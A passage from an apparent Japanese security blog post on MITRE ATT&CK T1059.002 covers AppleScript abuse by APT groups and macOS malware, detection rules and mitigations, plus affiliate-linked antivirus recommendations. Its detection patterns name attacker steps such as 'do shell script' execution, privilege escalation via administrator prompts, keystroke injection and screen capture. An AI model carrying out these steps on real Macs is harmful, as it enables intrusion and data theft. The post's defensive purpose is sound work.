ベトナムを拠点とするとされるAPTグループ「OceanLotus（APT32）」は、macOSを標的とした攻撃キャンペーンでAppleScriptを積極的に活用しています。同グループはmacOS向けのバックドアにAppleScriptベースのペイロードを組み込み、osascript経由でシステム情報の収集やC2通信を実行しました。特に東南アジア地域のジャーナリストや人権活動家を標的とした攻撃において、この手法が確認されています。

Lazarus Group

北朝鮮に関連するとされる「Lazarus Group」は、macOS環境への侵入後の活動でAppleScriptを利用するケースが報告されています。暗号資産関連企業を狙ったソーシャルエンジニアリング攻撃の後段階で、AppleScriptを用いた情報収集や永続化が確認されました。

その他の事例

• Bundlore：macOS向けアドウェアがAppleScriptを使ってブラウザ拡張機能をインストール
• XCSSET：Xcodeプロジェクトを介したサプライチェーン攻撃でAppleScriptペイロードを展開
• OSX/Dok：プロキシ設定の変更にAppleScriptを使用し、中間者攻撃を実現

検知方法：AppleScript悪用を見抜く

AppleScriptの悪用を効果的に検知するには、複数のレイヤーでの監視が必要です。

プロセス監視（osascriptの実行検知）

最も基本的な検知手法は、osascriptプロセスの実行を監視することです。

• osascriptの起動ログ：osascriptが実行された日時、親プロセス、引数を記録
• 異常な親プロセス：Webブラウザやメールクライアントからosascriptが起動された場合は要注意
• コマンドライン引数の監視：-eオプションでインラインスクリプトが実行される場合、攻撃の可能性が高い

Syslog・統合ログによる監視

macOSの統合ログ（Unified Logging System）を活用した検知も有効です。

• log show --predicate 'process == "osascript"' でosascript関連ログを抽出
• Apple Eventsのログからアプリケーション間通信の異常を検知
• TCC（Transparency, Consent, and Control）フレームワークのログで権限アクセスを監視

EDR（Endpoint Detection and Response）の活用

商用EDR製品を導入している環境では、以下の検知ルールが有効です。

• osascriptによるdo shell scriptの実行パターン
• AppleScriptからのネットワーク通信（特に外部IPへの接続）
• System Events経由のGUI操作（キーストローク送信、スクリーンキャプチャ）
• 権限昇格を試みるAppleScriptの実行（with administrator privileges句の使用）

緩和策：AppleScript悪用を防ぐ

AppleScriptの悪用リスクを低減するための具体的な対策を紹介します。

macOS標準のセキュリティ機能の活用

• Gatekeeper：署名されていないアプリケーションの実行をブロック
• TCC（Transparency, Consent, and Control）：アプリケーションのアクセス許可を厳格に管理。AppleScriptによるアクセシビリティ機能の利用を制限
• SIP（System Integrity Protection）：システムファイルの改変を防止
• XProtect：既知のマルウェア署名に基づくAppleScriptペイロードの検知

MDM（モバイルデバイス管理）による制御

• 構成プロファイルでAppleScriptの実行を制限
• osascriptバイナリへのアクセス制御を適用
• 許可されたスクリプトのみ実行可能なホワイトリスト方式の導入

運用面での対策

• 最小権限の原則：ユーザーアカウントに不要な管理者権限を付与しない
• アプリケーション制御：業務に不要なスクリプティング機能を無効化
• セキュリティ意識向上：従業員に対するフィッシング対策トレーニング（AppleScript実行を促す攻撃への対処）
• 定期的な監査：osascriptの実行ログを定期的にレビュー

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
AppleScriptを悪用したmacOS攻撃に対抗するには、信頼性の高いセキュリティソフトの導入を強くお勧めします。

• ESET（イーセット） — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR
• ウイルスバスター — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR
• Norton（ノートン） — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ

T1059.002 AppleScriptの悪用は、macOS環境における深刻な脅威です。本記事の要点を整理します。

• AppleScriptはmacOS標準のスクリプト言語であり、osascriptコマンドやIPC機能を通じて攻撃者に悪用される
• OceanLotus（APT32）やLazarus Groupなど、実際のAPTグループがmacOS標的攻撃にAppleScriptを利用している
• 検知にはosascriptプロセスの監視、統合ログの分析、EDRの活用が効果的
• TCC・Gatekeeper・SIPなどmacOS標準のセキュリティ機能とMDMによる制御が緩和策の要
• 最小権限の原則と定期的な監査が運用面での基本対策となる

macOSは「安全なOS」という認識がありますが、AppleScriptのような正規機能が攻撃に転用される事例は増加しています。自社のmacOS環境を守るために、本記事で紹介した検知・緩和策の導入を検討してください。

参考リンク

• MITRE ATT&CK T1059.002 – AppleScript（公式）
• IPA（情報処理推進機構）セキュリティ情報
• JPCERT/CC
• NISC（内閣サイバーセキュリティセンター）
• Apple – AppleScript公式ガイド

関連記事：T1059 コマンドおよびスクリプトインタプリタとは？ | T1059.001 PowerShellを悪用した攻撃手法 | T1059.005 Visual Basic（VBA/VBScript）を悪用した攻撃手法

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.
本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイトをご参照ください。

The post T1059.002 AppleScriptを悪用した攻撃手法と検知方法【MITRE ATT&CK】 appeared first on AI Security Review.